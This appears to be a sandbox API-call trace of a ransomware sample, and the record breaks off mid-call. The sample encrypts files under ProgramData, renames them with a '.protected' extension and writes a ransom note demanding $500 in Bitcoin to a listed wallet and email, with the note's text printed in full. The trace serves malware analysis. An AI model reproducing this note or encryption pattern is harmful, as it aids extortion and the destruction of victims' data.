[0072.887] StrStrW (lpFirst="MS.WINWORD.14.1033.hxn", lpSrch=".zip") returned 0x0 [0072.887] ReadFile (in: hFile=0xa4, lpBuffer=0x49d448, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesRead=0x295f3e4*=0x152, lpOverlapped=0x0) returned 1 [0072.888] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xfffffeae, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.888] WriteFile (in: hFile=0xa4, lpBuffer=0x49d448*, nNumberOfBytesToWrite=0x152, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesWritten=0x295f3e4*=0x152, lpOverlapped=0x0) returned 1 [0072.888] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.888] WriteFile (in: hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0072.888] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0072.888] CloseHandle (hObject=0xa4) returned 1 [0072.889] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn.protected") returned 66 [0072.889] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.winword.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn.protected" (normalized: "c:\\programdata\\microsoft help\\ms.winword.14.1033.hxn.protected")) returned 1 [0072.889] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0072.889] lstrcmpiW (lpString1="MS.WINWORD.DEV.14.1033.hxn", lpString2="Windows") returned -1 [0072.889] lstrcmpiW (lpString1="MS.WINWORD.DEV.14.1033.hxn", lpString2="Program Files") returned -1 [0072.889] lstrcmpiW (lpString1="MS.WINWORD.DEV.14.1033.hxn", lpString2="Program Files (x86)") returned -1 [0072.889] lstrcmpiW (lpString1="MS.WINWORD.DEV.14.1033.hxn", lpString2="$Recycle.bin") returned 1 [0072.889] lstrcmpiW (lpString1="MS.WINWORD.DEV.14.1033.hxn", lpString2="System Volume Information") returned -1 [0072.889] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn") returned 60 [0072.889] StrStrIW (lpFirst="MS.WINWORD.DEV.14.1033.hxn", lpSrch=".protected") returned 0x0 [0072.889] lstrcmpW (lpString1="MS.WINWORD.DEV.14.1033.hxn", lpString2="RESTORE_FILES.txt") returned -1 [0072.889] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0072.889] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0072.889] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.winword.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0072.890] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn") returned 60 [0072.890] StrStrW (lpFirst="MS.WINWORD.DEV.14.1033.hxn", lpSrch=".txt") returned 0x0 [0072.890] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn") returned 60 [0072.890] StrStrW (lpFirst="MS.WINWORD.DEV.14.1033.hxn", lpSrch=".rar") returned 0x0 [0072.890] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn") returned 60 [0072.890] StrStrW (lpFirst="MS.WINWORD.DEV.14.1033.hxn", lpSrch=".zip") returned 0x0 [0072.890] ReadFile (in: hFile=0xa4, lpBuffer=0x49d448, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesRead=0x295f3e4*=0x16a, lpOverlapped=0x0) returned 1 [0072.891] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xfffffe96, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.891] WriteFile (in: hFile=0xa4, lpBuffer=0x49d448*, nNumberOfBytesToWrite=0x16a, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesWritten=0x295f3e4*=0x16a, lpOverlapped=0x0) returned 1 [0072.893] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.893] WriteFile (in: hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0072.893] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0072.893] CloseHandle (hObject=0xa4) returned 1 [0072.893] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn.protected") returned 70 [0072.893] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.winword.dev.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn.protected" (normalized: "c:\\programdata\\microsoft help\\ms.winword.dev.14.1033.hxn.protected")) returned 1 [0072.894] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0072.894] lstrcmpiW (lpString1="nslist.hxl", lpString2="Windows") returned -1 [0072.894] lstrcmpiW (lpString1="nslist.hxl", lpString2="Program Files") returned -1 [0072.894] lstrcmpiW (lpString1="nslist.hxl", lpString2="Program Files (x86)") returned -1 [0072.894] lstrcmpiW (lpString1="nslist.hxl", lpString2="$Recycle.bin") returned 1 [0072.894] lstrcmpiW (lpString1="nslist.hxl", lpString2="System Volume Information") returned -1 [0072.894] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\nslist.hxl") returned 44 [0072.894] StrStrIW (lpFirst="nslist.hxl", lpSrch=".protected") returned 0x0 [0072.894] lstrcmpW (lpString1="nslist.hxl", lpString2="RESTORE_FILES.txt") returned -1 [0072.894] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0072.894] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0072.894] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\nslist.hxl" (normalized: "c:\\programdata\\microsoft help\\nslist.hxl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0072.894] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\nslist.hxl") returned 44 [0072.894] StrStrW (lpFirst="nslist.hxl", lpSrch=".txt") returned 0x0 [0072.894] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\nslist.hxl") returned 44 [0072.894] StrStrW (lpFirst="nslist.hxl", lpSrch=".rar") returned 0x0 [0072.894] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\nslist.hxl") returned 44 [0072.894] StrStrW (lpFirst="nslist.hxl", lpSrch=".zip") returned 0x0 [0072.894] ReadFile (in: hFile=0xa4, lpBuffer=0x49d448, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesRead=0x295f3e4*=0x21dc, lpOverlapped=0x0) returned 1 [0072.908] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xffffde24, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.908] WriteFile (in: hFile=0xa4, lpBuffer=0x49d448*, nNumberOfBytesToWrite=0x21dc, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesWritten=0x295f3e4*=0x21dc, lpOverlapped=0x0) returned 1 [0072.909] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.909] WriteFile (in: hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0072.909] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0072.909] CloseHandle (hObject=0xa4) returned 1 [0072.909] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\nslist.hxl.protected") returned 54 [0072.909] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\nslist.hxl" (normalized: "c:\\programdata\\microsoft help\\nslist.hxl"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\nslist.hxl.protected" (normalized: "c:\\programdata\\microsoft help\\nslist.hxl.protected")) returned 1 [0072.910] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0 [0072.910] FindClose (in: hFindFile=0x494b80 | out: hFindFile=0x494b80) returned 1 [0072.910] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\RESTORE_FILES.txt") returned 51 [0072.910] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft help\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0072.910] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0072.910] WriteFile (in: hFile=0xac, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f3e4*=0x53d, lpOverlapped=0x0) returned 1 [0072.911] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0072.911] WriteFile (in: hFile=0xac, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f3e4*=0x2ac, lpOverlapped=0x0) returned 1 [0072.911] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0072.911] WriteFile (in: hFile=0xac, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f3e4*=0xb1, lpOverlapped=0x0) returned 1 [0072.911] CloseHandle (hObject=0xac) returned 1 [0072.911] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0072.911] lstrcmpiW (lpString1="Mozilla", lpString2="Windows") returned -1 [0072.911] lstrcmpiW (lpString1="Mozilla", lpString2="Program Files") returned -1 [0072.911] lstrcmpiW (lpString1="Mozilla", lpString2="Program Files (x86)") returned -1 [0072.911] lstrcmpiW (lpString1="Mozilla", lpString2="$Recycle.bin") returned 1 [0072.911] lstrcmpiW (lpString1="Mozilla", lpString2="System Volume Information") returned -1 [0072.911] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Mozilla") returned 26 [0072.911] lstrcmpW (lpString1="Mozilla", lpString2=".") returned 1 [0072.911] lstrcmpW (lpString1="Mozilla", lpString2="..") returned 1 [0072.911] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Mozilla\\*") returned 28 [0072.911] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Mozilla\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0x494b80 [0072.912] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0072.912] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0072.912] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0072.912] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0072.912] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0072.912] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Mozilla\\.") returned 28 [0072.912] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.912] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0072.912] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0072.912] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0072.912] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0072.912] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0072.912] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0072.912] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Mozilla\\..") returned 29 [0072.912] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.912] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.912] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0072.912] lstrcmpiW (lpString1="logs", lpString2="Windows") returned -1 [0072.912] lstrcmpiW (lpString1="logs", lpString2="Program Files") returned -1 [0072.912] lstrcmpiW (lpString1="logs", lpString2="Program Files (x86)") returned -1 [0072.912] lstrcmpiW (lpString1="logs", lpString2="$Recycle.bin") returned 1 [0072.912] lstrcmpiW (lpString1="logs", lpString2="System Volume Information") returned -1 [0072.912] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Mozilla\\logs") returned 31 [0072.912] lstrcmpW (lpString1="logs", lpString2=".") returned 1 [0072.912] lstrcmpW (lpString1="logs", lpString2="..") returned 1 [0072.912] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Mozilla\\logs\\*") returned 33 [0072.912] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Mozilla\\logs\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x490a28 [0072.916] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0072.916] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0072.916] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0072.916] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0072.916] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0072.916] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Mozilla\\logs\\.") returned 33 [0072.916] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.916] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0072.917] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0072.917] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0072.917] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0072.917] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0072.917] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0072.917] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Mozilla\\logs\\..") returned 34 [0072.917] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.917] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.917] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0072.917] lstrcmpiW (lpString1="maintenanceservice-install.log", lpString2="Windows") returned -1 [0072.917] lstrcmpiW (lpString1="maintenanceservice-install.log", lpString2="Program Files") returned -1 [0072.917] lstrcmpiW (lpString1="maintenanceservice-install.log", lpString2="Program Files (x86)") returned -1 [0072.917] lstrcmpiW (lpString1="maintenanceservice-install.log", lpString2="$Recycle.bin") returned 1 [0072.917] lstrcmpiW (lpString1="maintenanceservice-install.log", lpString2="System Volume Information") returned -1 [0072.917] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Mozilla\\logs\\maintenanceservice-install.log") returned 62 [0072.917] StrStrIW (lpFirst="maintenanceservice-install.log", lpSrch=".protected") returned 0x0 [0072.917] lstrcmpW (lpString1="maintenanceservice-install.log", lpString2="RESTORE_FILES.txt") returned -1 [0072.917] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0072.917] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0072.917] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Mozilla\\logs\\maintenanceservice-install.log" (normalized: "c:\\programdata\\mozilla\\logs\\maintenanceservice-install.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0072.917] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Mozilla\\logs\\maintenanceservice-install.log") returned 62 [0072.917] StrStrW (lpFirst="maintenanceservice-install.log", lpSrch=".txt") returned 0x0 [0072.917] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Mozilla\\logs\\maintenanceservice-install.log") returned 62 [0072.917] StrStrW (lpFirst="maintenanceservice-install.log", lpSrch=".rar") returned 0x0 [0072.917] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Mozilla\\logs\\maintenanceservice-install.log") returned 62 [0072.917] StrStrW (lpFirst="maintenanceservice-install.log", lpSrch=".zip") returned 0x0 [0072.917] ReadFile (in: hFile=0xb4, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295f174*=0xa4, lpOverlapped=0x0) returned 1 [0072.918] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffff5c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.918] WriteFile (in: hFile=0xb4, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0xa4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295f174*=0xa4, lpOverlapped=0x0) returned 1 [0072.918] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.918] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0072.918] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0072.918] CloseHandle (hObject=0xb4) returned 1 [0072.919] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Mozilla\\logs\\maintenanceservice-install.log.protected") returned 72 [0072.919] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Mozilla\\logs\\maintenanceservice-install.log" (normalized: "c:\\programdata\\mozilla\\logs\\maintenanceservice-install.log"), lpNewFileName="\\\\?\\C:\\ProgramData\\Mozilla\\logs\\maintenanceservice-install.log.protected" (normalized: "c:\\programdata\\mozilla\\logs\\maintenanceservice-install.log.protected")) returned 1 [0072.919] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0072.919] FindClose (in: hFindFile=0x490a28 | out: hFindFile=0x490a28) returned 1 [0072.931] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Mozilla\\logs\\RESTORE_FILES.txt") returned 49 [0072.931] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Mozilla\\logs\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\mozilla\\logs\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0072.931] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0072.931] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0072.932] lstrlenA 